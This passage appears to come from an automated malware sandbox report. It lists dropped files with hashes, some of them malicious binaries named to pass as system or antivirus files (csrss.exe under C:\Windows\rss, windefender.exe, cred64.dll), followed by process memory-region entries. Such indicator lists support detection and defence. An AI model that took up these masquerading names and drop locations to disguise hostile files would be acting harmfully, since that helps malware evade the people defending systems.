                                            7a0ae706e3a707044025023dac0adeef6eafc5558aa6bd7b52da30c8ad037376fab6518a1ecfdcec5f15eead18e96bfaacf89d9ab0567f8e4cb848f1c4a706c7

                                          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                            Filesize

                                            18KB

                                            MD5

                                            23f05f50e9f89ed945b0a36ee4e73b36

                                            SHA1

                                            27cbc5acaa8c0f50b77ef81d26f5e7ba93666be1

                                            SHA256

                                            1f114dbeed1d596c101b93861393c9355f5f46bf02a96dd242343816df1dd13b

                                            SHA512

                                            585f0f159e5ae183b65a4bbe6f3bae34805a21778b6b2c1fea995d01b34bce1d7b4fb4d00c426300b2909abc82e231451c51230a3d4bb8a8feff642d4bbffb5e

                                          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                            Filesize

                                            18KB

                                            MD5

                                            bde8dc79e98fc891fc759cda69f0957a

                                            SHA1

                                            528c26eb9c7b1a1158ad4b6654b734d11f003e4d

                                            SHA256

                                            76e17fb189c097b612a128d1ae9c1b60c16c3d68d80629c62464adb5493651e2

                                            SHA512

                                            9a7293412a74c50c900ca17cd6e66cdf571ea8deb0af16e9454e820737402205d58c9f5a4b372ab8587dfec5ba6c9523d1727961a632c342c342e2587a72e45d

                                          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                            Filesize

                                            18KB

                                            MD5

                                            6ba2924eca77d367b674b286835bef45

                                            SHA1

                                            4235d34350a5c361032826fbe88c85e170d6818f

                                            SHA256

                                            9ee46d0fe5dacdae86665d60f7cd59041afb2ec485cbee375f35cd42aceb6be8

                                            SHA512

                                            5c7a8090f16a46898cf83d6e1c20d368a4e69ba1072e6193f94216a77db75d4061188a453203c0bb6531ecabcfa06d145cfb67938f052659e75a195a85ea9b8b

                                          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                            Filesize

                                            18KB

                                            MD5

                                            527db97fbbd6cc19638dada9973df384

                                            SHA1

                                            9e885384e308539f3200b17a7c77e04950b5b2df

                                            SHA256

                                            ae1982c33cda5a1f234fd40d65daec1170ac83cd7678cc991e040df102737fc1

                                            SHA512

                                            5978a94a31c3073088d7bd170ddee260d8cef42d2668023bf3102b66faf12859b72ebdcbad3141c23fbd9a2c2f8b7fe88c4659a01f0a4e33a578a2403437e524

                                          • C:\Windows\rss\csrss.exe

                                            Filesize

                                            1.3MB

                                            MD5

                                            43fae533c2b520dfda0c1abc27177ebd

                                            SHA1

                                            ae04e6d9f21300a5bfe2c33a1380392481bf5976

                                            SHA256

                                            16ca08c4d54425386fd6145677ae0b0e9602eaa4f86bcb2faf14a3778048fa16

                                            SHA512

                                            a8f580dfc80cd33402fb84f02bfaac85c1bce582aa861637a1efa2c0fa88a3a3ca5211c9b35f8cea4d676e252346235e26afc40ea27828d7c2210ab166a693ca

                                          • C:\Windows\rss\csrss.exe

                                            Filesize

                                            1.1MB

                                            MD5

                                            1b0780e262c613eb8dbfa3875790848f

                                            SHA1

                                            4d9a117b4d461e74ea3515cccb3adf9f6a58c9ff

                                            SHA256

                                            ba2f6ed2cf5a5ffbdd7886b61a4c54979c07a7982c5cff64d5fb73d28bd14efb

                                            SHA512

                                            2c08b60027e169bbd4d24bf277dff982b16b8f36364b5408a336b16ce96711959b9544c2a2c5178575a7ed4744faecee81529116e45e19729f953bb661c2c71d

                                          • C:\Windows\rss\csrss.exe

                                            Filesize

                                            1.3MB

                                            MD5

                                            3e0687fedeb2b87eb0249f52d0691e78

                                            SHA1

                                            daa76457a282c22754a06bdeecd99b2f5ff850b7

                                            SHA256

                                            64e9391421eae8563132beab57b0c6c4a2d6d3eabb13cacf4f77802ba25df75d

                                            SHA512

                                            575a2165b9414e65891dbb78eb3989dec37139e37ab6969d762b0f95bfbfe886a3ed8b4e944db4cd3659946708cc91f88737f2890c952dc00bcd0af2ddac529f

                                          • C:\Windows\windefender.exe

                                            Filesize

                                            1.2MB

                                            MD5

                                            d953a3f8234f4757ec2207e51eb74e6e

                                            SHA1

                                            0e0a08ccc119a9de1377a42af9f0258ec84f872e

                                            SHA256

                                            871ecc6e3120ce74e5aec08b3b2d883a5daee44a6299e87702871e895454ed74

                                            SHA512

                                            04e6620b4e98dcf064f9815504422202270da4dc109362bb19b86959db0132a70e17c27247a6ad413476d026295fffa18ccb242f229fef511e520dc11cbffb16

                                          • C:\Windows\windefender.exe

                                            Filesize

                                            2.0MB

                                            MD5

                                            8e67f58837092385dcf01e8a2b4f5783

                                            SHA1

                                            012c49cfd8c5d06795a6f67ea2baf2a082cf8625

                                            SHA256

                                            166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa

                                            SHA512

                                            40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

                                          • \??\c:\users\admin\appdata\local\temp\u2o.1.exe

                                            Filesize

                                            768KB

                                            MD5

                                            94a401c6d838458eae612f14c5a6b9d8

                                            SHA1

                                            756f217ae5138e7215e3daccfe5869488eba37b2

                                            SHA256

                                            4f843121b9a1242a6930a2730830fc8dec2b31e0a87a6ea4c44001982b877e7c

                                            SHA512

                                            65a0d7ecb5750c9ce110979aaba87f5fafb12a1b18c081749ce8339b846fd8737346b2d4557043427841794b964075fd682d075b23e3c4e87bdcc26d2abbc112

                                          • \ProgramData\nss3.dll

                                            Filesize

                                            2.0MB

                                            MD5

                                            1cc453cdf74f31e4d913ff9c10acdde2

                                            SHA1

                                            6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                            SHA256

                                            ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                            SHA512

                                            dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                          • \Users\Admin\AppData\Local\Temp\is-C88EG.tmp\_isetup\_iscrypt.dll

                                            Filesize

                                            2KB

                                            MD5

                                            a69559718ab506675e907fe49deb71e9

                                            SHA1

                                            bc8f404ffdb1960b50c12ff9413c893b56f2e36f

                                            SHA256

                                            2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

                                            SHA512

                                            e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

                                          • \Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

                                            Filesize

                                            1.2MB

                                            MD5

                                            58e1bc68cae045cd472efbd81bbb9d54

                                            SHA1

                                            e74cb981a49b3de7c9cd8efa2e98534150e338f5

                                            SHA256

                                            d7af37982bfde2086b0fc147eb551d572f595160b25bfcd700287f8ce4581621

                                            SHA512

                                            e0361f9e5e9fb4baf5ee38fb971aa4493d0b20d1e1e8e8c3d9f582e116a33b935cfcc57d7df259984170c932b12507b6e22c607bddf75367725cb530041f7f7d

                                          • memory/96-62-0x0000000000760000-0x0000000000860000-memory.dmp

                                            Filesize

                                            1024KB

                                          • memory/96-351-0x0000000000760000-0x0000000000860000-memory.dmp

                                            Filesize

                                            1024KB

                                          • memory/96-352-0x0000000000400000-0x0000000000568000-memory.dmp

                                            Filesize

                                            1.4MB

                                          • memory/96-71-0x0000000000400000-0x0000000000568000-memory.dmp

                                            Filesize

                                            1.4MB

                                          • memory/96-66-0x00000000006F0000-0x000000000075F000-memory.dmp

                                            Filesize

                                            444KB

                                          • memory/96-426-0x0000000000400000-0x0000000000568000-memory.dmp

                                            Filesize

                                            1.4MB

                                          • memory/660-428-0x0000000002EE0000-0x00000000037CB000-memory.dmp

                                            Filesize

                                            8.9MB

                                          • memory/660-806-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                            Filesize

                                            9.1MB

                                          • memory/660-81-0x0000000002EE0000-0x00000000037CB000-memory.dmp

                                            Filesize

                                            8.9MB

                                          • memory/660-642-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                            Filesize

                                            9.1MB

                                          • memory/660-79-0x0000000002AE0000-0x0000000002EDD000-memory.dmp

                                            Filesize

                                            4.0MB

                                          • memory/660-84-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                            Filesize

                                            9.1MB

                                          • memory/660-456-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                            Filesize

                                            9.1MB

                                          • memory/660-409-0x0000000002AE0000-0x0000000002EDD000-memory.dmp

                                            Filesize

                                            4.0MB

                                          • memory/780-803-0x0000000000400000-0x00000000008AD000-memory.dmp

                                            Filesize

                                            4.7MB

                                          • memory/780-432-0x0000000000990000-0x0000000000991000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/780-636-0x0000000000400000-0x00000000008AD000-memory.dmp

                                            Filesize

                                            4.7MB

                                          • memory/1256-430-0x00000000779D4000-0x00000000779D5000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/1256-454-0x0000000001390000-0x0000000001854000-memory.dmp

                                            Filesize

                                            4.8MB

                                          • memory/1256-495-0x0000000001390000-0x0000000001854000-memory.dmp

                                            Filesize

                                            4.8MB

                                          • memory/1256-415-0x0000000001390000-0x0000000001854000-memory.dmp

                                            Filesize

                                            4.8MB

                                          • memory/1256-451-0x0000000005120000-0x0000000005121000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/1256-447-0x00000000050E0000-0x00000000050E1000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/1256-436-0x0000000005100000-0x0000000005101000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/1256-437-0x0000000005110000-0x0000000005111000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/1256-440-0x00000000050F0000-0x00000000050F1000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/1256-442-0x0000000005130000-0x0000000005131000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/1256-443-0x00000000050D0000-0x00000000050D1000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/1292-363-0x00000000075F0000-0x0000000007940000-memory.dmp

                                            Filesize

                                            3.3MB

                                          • memory/1292-350-0x00000000028F0000-0x0000000002900000-memory.dmp

                                            Filesize

                                            64KB

                                          • memory/1292-425-0x0000000006830000-0x000000000686C000-memory.dmp

                                            Filesize

                                            240KB

                                          • memory/1292-383-0x00000000079F0000-0x0000000007A3B000-memory.dmp

                                            Filesize

                                            300KB

                                          • memory/1292-382-0x00000000079A0000-0x00000000079BC000-memory.dmp

                                            Filesize

                                            112KB

                                          • memory/1292-348-0x00000000041A0000-0x00000000041D6000-memory.dmp

                                            Filesize

                                            216KB

                                          • memory/1292-349-0x00000000726F0000-0x0000000072DDE000-memory.dmp

                                            Filesize

                                            6.9MB

                                          • memory/1292-358-0x00000000073C0000-0x0000000007426000-memory.dmp

                                            Filesize

                                            408KB

                                          • memory/1292-357-0x0000000007350000-0x00000000073B6000-memory.dmp

                                            Filesize

                                            408KB

                                          • memory/1292-355-0x0000000006D20000-0x0000000007348000-memory.dmp

                                            Filesize

                                            6.2MB

                                          • memory/1292-354-0x00000000028F0000-0x0000000002900000-memory.dmp

                                            Filesize

                                            64KB

                                          • memory/1292-356-0x0000000006B20000-0x0000000006B42000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/1964-1394-0x0000000000400000-0x0000000000512000-memory.dmp

                                            Filesize

                                            1.1MB

                                          • memory/2124-1367-0x00007FF721360000-0x00007FF721C94000-memory.dmp

                                            Filesize

                                            9.2MB

                                          • memory/2228-339-0x00000000021A0000-0x00000000021E0000-memory.dmp

                                            Filesize

                                            256KB

                                          • memory/2228-336-0x0000000002150000-0x0000000002198000-memory.dmp

                                            Filesize

                                            288KB

                                          • memory/2228-341-0x00000000021A0000-0x00000000021E0000-memory.dmp

                                            Filesize

                                            256KB

                                          • memory/2228-340-0x00000000021A0000-0x00000000021E0000-memory.dmp

                                            Filesize

                                            256KB

                                          • memory/2228-338-0x00000000021A0000-0x00000000021E0000-memory.dmp

                                            Filesize

                                            256KB

                                          • memory/2228-342-0x00000000021A0000-0x00000000021E0000-memory.dmp

                                            Filesize

                                            256KB

                                          • memory/2228-337-0x0000000000400000-0x0000000000558000-memory.dmp

                                            Filesize

                                            1.3MB

                                          • memory/2228-343-0x00000000021A0000-0x00000000021E0000-memory.dmp

                                            Filesize

                                            256KB

                                          • memory/2228-345-0x0000000000400000-0x0000000000558000-memory.dmp

                                            Filesize

                                            1.3MB

                                          • memory/2228-335-0x0000000000640000-0x0000000000740000-memory.dmp

                                            Filesize

                                            1024KB

                                          • memory/2296-517-0x0000000000400000-0x00000000004B8000-memory.dmp

                                            Filesize

                                            736KB

                                          • memory/2296-251-0x00000000001F0000-0x00000000001F1000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/2896-67-0x0000000073BA0000-0x000000007428E000-memory.dmp

                                            Filesize

                                            6.9MB

                                          • memory/2896-40-0x00000000004A0000-0x0000000000BE0000-memory.dmp

                                            Filesize

                                            7.2MB

                                          • memory/2896-39-0x0000000073BA0000-0x000000007428E000-memory.dmp

                                            Filesize

                                            6.9MB

                                          • memory/3036-312-0x00000000001F0000-0x00000000001F1000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/3036-310-0x00000000001F0000-0x00000000001F1000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/3036-323-0x0000000001290000-0x00000000012D0000-memory.dmp

                                            Filesize

                                            256KB

                                          • memory/3036-314-0x00000000001F0000-0x00000000001F1000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/3036-311-0x00000000001F0000-0x00000000001F1000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/3036-247-0x00000000012F0000-0x0000000001696000-memory.dmp

                                            Filesize

                                            3.6MB

                                          • memory/3036-326-0x0000000001290000-0x00000000012D0000-memory.dmp

                                            Filesize

                                            256KB

                                          • memory/3336-25-0x00000000034D0000-0x00000000034E6000-memory.dmp

                                            Filesize

                                            88KB

                                          • memory/3336-4-0x0000000001580000-0x0000000001596000-memory.dmp

                                            Filesize

                                            88KB

                                          • memory/3568-1132-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                            Filesize

                                            9.1MB

                                          • memory/3568-1614-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                            Filesize

                                            9.1MB

                                          • memory/4104-3-0x0000000000400000-0x000000000053E000-memory.dmp

                                            Filesize

                                            1.2MB

                                          • memory/4104-1-0x0000000000620000-0x0000000000720000-memory.dmp

                                            Filesize

                                            1024KB

                                          • memory/4104-2-0x00000000005A0000-0x00000000005AB000-memory.dmp

                                            Filesize

                                            44KB

                                          • memory/4104-5-0x0000000000400000-0x000000000053E000-memory.dmp

                                            Filesize

                                            1.2MB

                                          • memory/4176-344-0x0000000000400000-0x000000000063B000-memory.dmp

                                            Filesize

                                            2.2MB

                                          • memory/4176-519-0x0000000000400000-0x000000000063B000-memory.dmp

                                            Filesize

                                            2.2MB

                                          • memory/4176-359-0x0000000061E00000-0x0000000061EF3000-memory.dmp

                                            Filesize

                                            972KB

                                          • memory/4176-333-0x00000000006A0000-0x00000000007A0000-memory.dmp

                                            Filesize

                                            1024KB

                                          • memory/4176-334-0x00000000007A0000-0x00000000007C7000-memory.dmp

                                            Filesize

                                            156KB

                                          • memory/4176-629-0x0000000000400000-0x000000000063B000-memory.dmp

                                            Filesize

                                            2.2MB

                                          • memory/4188-30-0x0000000005200000-0x0000000005308000-memory.dmp

                                            Filesize

                                            1.0MB

                                          • memory/4188-22-0x00000000032B0000-0x00000000032B6000-memory.dmp

                                            Filesize

                                            24KB

                                          • memory/4188-29-0x00000000050D0000-0x00000000051F3000-memory.dmp

                                            Filesize

                                            1.1MB

                                          • memory/4188-33-0x0000000005200000-0x0000000005308000-memory.dmp

                                            Filesize

                                            1.0MB

                                          • memory/4188-34-0x0000000005200000-0x0000000005308000-memory.dmp

                                            Filesize

                                            1.0MB

                                          • memory/4188-23-0x0000000010000000-0x0000000010239000-memory.dmp

                                            Filesize

                                            2.2MB

                                          • memory/4236-75-0x0000000000400000-0x0000000000414000-memory.dmp

                                            Filesize

                                            80KB

                                          • memory/4236-353-0x0000000000400000-0x0000000000414000-memory.dmp

                                            Filesize

                                            80KB

                                          • memory/4236-65-0x0000000000400000-0x0000000000414000-memory.dmp

                                            Filesize

                                            80KB

                                          • memory/4848-1871-0x0000000000600000-0x000000000064B000-memory.dmp

                                            Filesize

                                            300KB

                                          • memory/5072-18-0x0000000000400000-0x000000000053E000-memory.dmp

                                            Filesize

                                            1.2MB

                                          • memory/5072-17-0x0000000000560000-0x000000000056B000-memory.dmp

                                            Filesize

                                            44KB

                                          • memory/5072-16-0x00000000005C0000-0x00000000006C0000-memory.dmp

                                            Filesize

                                            1024KB

                                          • memory/5072-26-0x0000000000400000-0x000000000053E000-memory.dmp

                                            Filesize

                                            1.2MB